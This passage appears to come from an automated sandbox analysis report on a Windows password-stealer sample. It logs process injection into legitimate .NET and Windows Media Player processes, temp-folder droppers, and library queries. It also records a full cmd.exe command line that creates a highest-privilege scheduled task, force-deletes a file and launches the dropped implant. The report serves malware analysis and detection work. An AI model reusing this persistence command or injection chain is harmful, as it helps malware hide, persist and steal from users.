                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140001000
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 14002C000
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 14003F000
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140043000
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140046000
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140047000
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140057000
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 7A5BE9D010
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 406000
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 408000
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 848008
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeMemory written: C:\Program Files\Windows Media Player\wmplayer.exe base: 140000000
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeMemory written: C:\Program Files\Windows Media Player\wmplayer.exe base: 140001000
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeMemory written: C:\Program Files\Windows Media Player\wmplayer.exe base: 14000B000
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeMemory written: C:\Program Files\Windows Media Player\wmplayer.exe base: 14000E000
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeMemory written: C:\Program Files\Windows Media Player\wmplayer.exe base: 1402C5000
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeMemory written: C:\Program Files\Windows Media Player\wmplayer.exe base: 1402C6000
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeMemory written: C:\Program Files\Windows Media Player\wmplayer.exe base: 1402C7000
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeMemory written: C:\Program Files\Windows Media Player\wmplayer.exe base: 1402C8000
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeMemory written: C:\Program Files\Windows Media Player\wmplayer.exe base: 1402C9000
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeMemory written: C:\Program Files\Windows Media Player\wmplayer.exe base: A096187010
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess created: C:\Users\user\AppData\Local\Temp\spczxf.exe "C:\Users\user\AppData\Local\Temp\spczxf.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess created: C:\Users\user\AppData\Local\Temp\ohvrxt.exe "C:\Users\user\AppData\Local\Temp\ohvrxt.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess created: C:\Users\user\AppData\Local\Temp\hgzxhw.exe "C:\Users\user\AppData\Local\Temp\hgzxhw.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess created: C:\Users\user\AppData\Local\Temp\utntwb.exe "C:\Users\user\AppData\Local\Temp\utntwb.exe" Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 384 -p 432 -ip 432Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 432 -s 1216Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 544 -p 2908 -ip 2908Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2908 -s 3156Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 496 -p 1384 -ip 1384Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1384 -s 1200Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 544 -p 3660 -ip 3660Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3660 -s 3136Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 476 -p 5788 -ip 5788Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5788 -s 3120Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\ServiceHub\msbuild.exe "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe"
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "msbuild" /sc minute /tr "c:\users\user\appdata\local\servicehub\msbuild.exe" /rl highest /f && del /f /s /q /a "c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe" &&start "" "c:\users\user\appdata\local\servicehub\msbuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "msbuild" /sc minute /tr "c:\users\user\appdata\local\servicehub\msbuild.exe" /rl highest /f && del /f /s /q /a "c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe" &&start "" "c:\users\user\appdata\local\servicehub\msbuild.exe"
                  Source: C:\Windows\System32\svchost.exeCode function: 2_2_00000142DB1542F0 cpuid 2_2_00000142DB1542F0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\spczxf.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AdoNetDiag.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_filter.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_isapi.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Aspnet_perf.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_rc.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrcompression.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\compatjit.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CORPerfMonExt.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Culture.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfdll.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\diasymreader.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\FileTracker.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\fusion.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\ISymWrapper\v4.0_4.0.0.0__b03f5f7f11d50a3a\ISymWrapper.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\ISymWrapper\v4.0_4.0.0.0__b03f5f7f11d50a3a\ISymWrapper.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\ISymWrapper\v4.0_4.0.0.0__b03f5f7f11d50a3a\ISymWrapper.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Activities.Build.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Activities.Build\v4.0_4.0.0.0__31bf3856ad364e35\Microsoft.Activities.Build.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Conversion.v4.0\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Conversion.v4.0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Build.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Build.Engine.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Engine\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Build.Framework.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Tasks.v4.0\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Tasks.v4.0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Build.Utilities.v4.0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Utilities.v4.0\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Utilities.v4.0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Data.Entity.Build.Tasks.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Internal.Tasks.Dataflow.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Internal.Tasks.Dataflow\v4.0_4.0.0.0__b77a5c561934e089\Microsoft.Internal.Tasks.Dataflow.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.JScript.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.JScript\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Transactions.Bridge.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Transactions.Bridge\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Transactions.Bridge.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Transactions.Bridge.Dtc.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Transactions.Bridge.Dtc\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Transactions.Bridge.Dtc.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Transactions.Bridge.Dtc\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Transactions.Bridge.Dtc.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Transactions.Bridge.Dtc\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Transactions.Bridge.Dtc.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.VisualBasic.Activities.Compiler.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.VisualBasic.Activities.Compiler\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.Activities.Compiler.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.VisualBasic.Activities.Compiler\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.Activities.Compiler.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.VisualBasic.Activities.Compiler\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.Activities.Compiler.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.VisualBasic.Compatibility.Data.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic.Compatibility.Data\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.Compatibility.Data.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.VisualBasic.Compatibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic.Compatibility\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.Compatibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualC\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualC.Dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.VisualC.STLCLR.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualC.STLCLR\v4.0_2.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualC.STLCLR.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Win32.Primitives.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Win32.Primitives\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Win32.Primitives.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Windows.ApplicationServer.Applications.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.ApplicationServer.Applications\v4.0_4.0.0.0__31bf3856ad364e35\Microsoft.Windows.ApplicationServer.Applications.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MmcAspExt.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordacwks.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreeis.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll VolumeInformation
